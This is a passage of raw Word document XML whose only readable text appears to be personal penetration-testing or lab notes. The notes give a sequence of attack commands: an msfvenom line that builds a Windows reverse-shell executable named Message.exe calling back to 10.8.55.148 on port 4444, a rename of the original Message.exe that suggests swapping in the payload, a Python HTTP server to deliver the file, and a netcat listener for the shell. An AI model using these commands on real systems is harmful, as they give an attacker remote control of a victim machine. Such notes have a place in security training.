      <w:pPr>
        <w:ind w:right="-279"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5698665C" w14:textId="34F2EFA1" w:rsidR="009811EA" w:rsidRDefault="009811EA" w:rsidP="00C20665">
      <w:pPr>
        <w:ind w:right="-279"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009811EA">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">msfvenom -p windows/x64/shell_reverse_tcp lhost=10.8.55.148 lport=4444 -f exe -o </w:t>
      </w:r>
      <w:r w:rsidR="008E04C4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r w:rsidRPr="009811EA">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DFB7F8" w14:textId="2FA1A60C" w:rsidR="007261B5" w:rsidRDefault="007261B5" w:rsidP="00C20665">
      <w:pPr>
        <w:ind w:right="-279"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676BE4FC" w14:textId="0BFFE393" w:rsidR="007261B5" w:rsidRDefault="007261B5" w:rsidP="00C20665">
      <w:pPr>
        <w:ind w:right="-279"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rename Message.exe Message.old</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A92D9" w14:textId="77777777" w:rsidR="008E04C4" w:rsidRDefault="008E04C4" w:rsidP="00C20665">
      <w:pPr>
        <w:ind w:right="-279"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EE5AD9" w14:textId="74F5F2DD" w:rsidR="009811EA" w:rsidRPr="009811EA" w:rsidRDefault="009811EA" w:rsidP="00C20665">
      <w:pPr>
        <w:ind w:right="-279"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 -m http.server 9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B8DB48" w14:textId="7EC14294" w:rsidR="009811EA" w:rsidRDefault="009811EA" w:rsidP="00C20665">
      <w:pPr>
        <w:ind w:right="-279"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5724177C" w14:textId="49B87D3B" w:rsidR="009811EA" w:rsidRDefault="009811EA" w:rsidP="00C20665">
      <w:pPr>
        <w:ind w:right="-279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87E6D8E" wp14:editId="63A525D9">
            <wp:extent cx="5943600" cy="7480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1DB8" w14:textId="03E5FB28" w:rsidR="00B82799" w:rsidRDefault="00B82799" w:rsidP="00C20665">
      <w:pPr>
        <w:ind w:right="-279"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E0E2CF" w14:textId="0A7371AF" w:rsidR="00B82799" w:rsidRPr="00253137" w:rsidRDefault="00B82799" w:rsidP="00C20665">
      <w:pPr>
        <w:ind w:right="-279"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00253137">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc -lnvv -p 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D0EB15" w14:textId="77777777" w:rsidR="009C28B7" w:rsidRPr="00AE06A9" w:rsidRDefault="009C28B7" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009C28B7" w:rsidRPr="00AE06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44C1"/>
    <w:rsid w:val="00097709"/>
    <w:rsid w:val="000C2AA7"/>
    <w:rsid w:val="000F72D4"/>
    <w:rsid w:val="00147C38"/>
    <w:rsid w:val="001A488E"/>
    <w:rsid w:val="001D669E"/>
    <w:rsid w:val="00253137"/>
    <w:rsid w:val="002552A8"/>
    <w:rsid w:val="0027358F"/>
    <w:rsid w:val="002910D6"/>
    <w:rsid w:val="002D6574"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00364360"/>
    <w:rsid w:val="003C6F6A"/>
    <w:rsid w:val="003D4AA8"/>
    <w:rsid w:val="003D4D77"/>
    <w:rsid w:val="0041191A"/>
    <w:rsid w:val="004459E6"/>
    <w:rsid w:val="00481DB4"/>
    <w:rsid w:val="004F534C"/>
    <w:rsid w:val="00572C31"/>
    <w:rsid w:val="005826B6"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005A1E39"/>
    <w:rsid w:val="00617C60"/>
    <w:rsid w:val="006A4E83"/>
    <w:rsid w:val="006B7396"/>
    <w:rsid w:val="00710B85"/>
    <w:rsid w:val="007261B5"/>
    <w:rsid w:val="007701C8"/>
    <w:rsid w:val="008578A0"/>
    <w:rsid w:val="008875A0"/>
    <w:rsid w:val="008D1C9E"/>
    <w:rsid w:val="008E04C4"/>
    <w:rsid w:val="0090574A"/>
    <w:rsid w:val="00935E5C"/>
    <w:rsid w:val="009811EA"/>
    <w:rsid w:val="009C28B7"/>
    <w:rsid w:val="009F3B64"/>
    <w:rsid w:val="00A47390"/>
    <w:rsid w:val="00A708D5"/>
    <w:rsid w:val="00A8297B"/>
    <w:rsid w:val="00AD685A"/>
    <w:rsid w:val="00AE06A9"/>
    <w:rsid w:val="00B82799"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C20665"/>
    <w:rsid w:val="00C844C1"/>
    <w:rsid w:val="00C91BD8"/>
    <w:rsid w:val="00D019E9"/>
    <w:rsid w:val="00D111E5"/>
    <w:rsid w:val="00D552B8"/>
    <w:rsid w:val="00DC5C88"/>
    <w:rsid w:val="00DD77CC"/>
    <w:rsid w:val="00E11732"/>
    <w:rsid w:val="00F6170B"/>
    <w:rsid w:val="00FA6835"/>
    <w:rsid w:val="00FE75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C09BB7E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9DC959F3-2DD6-814A-85B5-90E33A657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8</Pages>
  <Words>380</Words>
  <Characters>2169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44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-27T01:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-28T07:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>